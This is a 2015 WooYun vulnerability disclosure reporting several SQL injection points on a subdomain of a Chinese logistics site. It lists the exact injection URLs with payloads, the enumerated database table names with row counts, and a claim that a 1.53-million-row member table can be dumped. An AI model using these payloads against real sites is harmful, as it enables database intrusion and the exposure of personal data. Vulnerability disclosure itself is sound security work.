当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142438

漏洞标题:中国物通网某站多处SQL注入(153万会员信息泄露)

相关厂商:中国物通网

漏洞作者: 路人甲

提交时间:2015-09-21 15:13

修复时间:2015-11-09 08:38

公开时间:2015-11-09 08:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-21: 细节已通知厂商并且等待厂商处理中
2015-09-25: 厂商已经确认,细节仅向厂商公开
2015-10-05: 细节向核心白帽子及相关领域专家公开
2015-10-15: 细节向普通白帽子公开
2015-10-25: 细节向实习白帽子公开
2015-11-09: 细节向公众公开

简要描述:

好几处,打包交了吧

详细说明:

注入点:
http://shebei.chinawutong.com/115.html?key=1' and 1=user -- -
http://shebei.chinawutong.com/116.html?key=1' and 1=user and '%'='
http://shebei.chinawutong.com/117.html?key=1' or 1=user and '%'='
http://shebei.chinawutong.com/115.html?p=1&fn=1' or 1=user and '%'='
http://shebei.chinawutong.com/115.html?p=1&fn=df&cn=1' and 1=user and '%'='

1.png


Database: Wutong
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| dbo.huoOld | 11178014 |
| dbo.syncobj_0x4633453042374444 | 6738156 |
| dbo.wshiMainline | 6738156 |
| dbo.syncobj_0x3439373531363345 | 1869411 |
| dbo.huiyuan | 1530707 |
| dbo.syncobj_0x4434363133443337 | 1530707 |
| dbo.ClickLog | 1528748 |
| dbo.huo | 1391652 |
| dbo.syncobj_0x3637443233313437 | 1391652 |
| dbo.syncobj_0x3531423844353443 | 1278404 |
| dbo.qiyepic | 1086054 |
| dbo.wshiMainline_Price | 862280 |
| dbo.qiye | 853886 |
| dbo.syncobj_0x3934324143354645 | 853886 |
| dbo.qiyeView | 853876 |
| dbo.push_Themes | 811198 |
| dbo.syncobj_0x3739364335463539 | 646082 |
| dbo.tb_SupplyInfor | 516983 |
| dbo.push_CustomerTempThemes | 512819 |
| dbo.CarLineUrl | 443147 |
| dbo.message | 257104 |
| dbo.syncobj_0x3032423438383034 | 257104 |
| dbo.syncobj_0x3846423930423839 | 207100 |
| dbo.wsheng | 165348 |
| dbo.zhaoshang | 84438 |
| dbo.push_autoPublish | 68067 |
| dbo.huo_order | 64417 |
| dbo.syncobj_0x4438333843394444 | 58612 |
| dbo.wshi | 58612 |
| dbo.ygrizhi | 57785 |
| dbo.syncobj_0x3846364531304330 | 46862 |
| dbo.kshi | 44881 |
| dbo.push_CustomerTopic | 37345 |
| dbo.syncobj_0x3938453936374632 | 18354 |
| dbo.ksheng | 13025 |
| dbo.kuaijian | 11837 |
| dbo.CoPicture | 11073 |
| dbo.jianli | 8591 |
| dbo.DiaoCha | 5875 |
| dbo.wxt_dd | 5718 |
| dbo.AIRPORT | 4915 |
| dbo.push_roborder | 4022 |
| dbo.CustLocation | 4011 |
| dbo.jiameng_order | 3969 |
| dbo.infomationAppraise | 3454 |
| dbo.Appraise | 2872 |
| dbo.renzheng_geren | 2574 |
| dbo.CustLink | 2114 |
| dbo.tb_BuyInfor | 1992 |
| dbo.wshiLinShi | 1953 |
| dbo.renzheng_qiye | 1886 |
| dbo.EmailTriggerRecord | 1855 |
| dbo.tem_userset | 1852 |
| dbo.link | 1512 |
| dbo.Cert_Car | 1338 |
| dbo.ChengYunOrder | 1258 |
| dbo.wshiOrder | 1212 |
| dbo.CW_Device | 725 |
| dbo.syncobj_0x3630373132373946 | 542 |
| dbo.view_Prize | 530 |
| dbo.sysarticlecolumns | 441 |
| dbo.BlackList | 433 |
| dbo.syssubscriptions | 417 |
| dbo.Emails | 295 |
| dbo.DomainList | 245 |
| dbo.tb_TwoLeve | 178 |
| dbo.sysextendedarticlesview | 139 |
| dbo.CARRIER | 137 |
| dbo.sysschemaarticles | 126 |
| dbo.news | 70 |
| dbo.gpsUserInfo | 60 |
| dbo.Collect_Car | 52 |
| dbo.yuangong | 48 |
| dbo.GY_CharityCom | 37 |
| dbo.jop | 24 |
| dbo.tb_OneLeve | 20 |
| dbo.sysarticles | 13 |
| dbo.zhengshu | 11 |
| dbo.huodong_order | 10 |
| dbo.huo_print | 8 |
| dbo.tc_car | 7 |
| dbo.keshi | 5 |
| dbo.Admin | 4 |
| dbo.powerUnit | 4 |
| dbo.userPower | 4 |
| dbo.yanzheng_jiashi | 4 |
| dbo.rolePower | 3 |
| dbo.wshiMainlineLinShi | 2 |
| dbo.yanzheng_xingshi | 2 |
| dbo.syspublications | 1 |
| dbo.sysreplservers | 1 |
+--------------------------------+---------+


表huiyuan为153万,可dump

2.png


3.png


漏洞证明:

2.png

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-25 08:36

厂商回复:

感谢对我们的支持 谢谢

最新状态:

暂无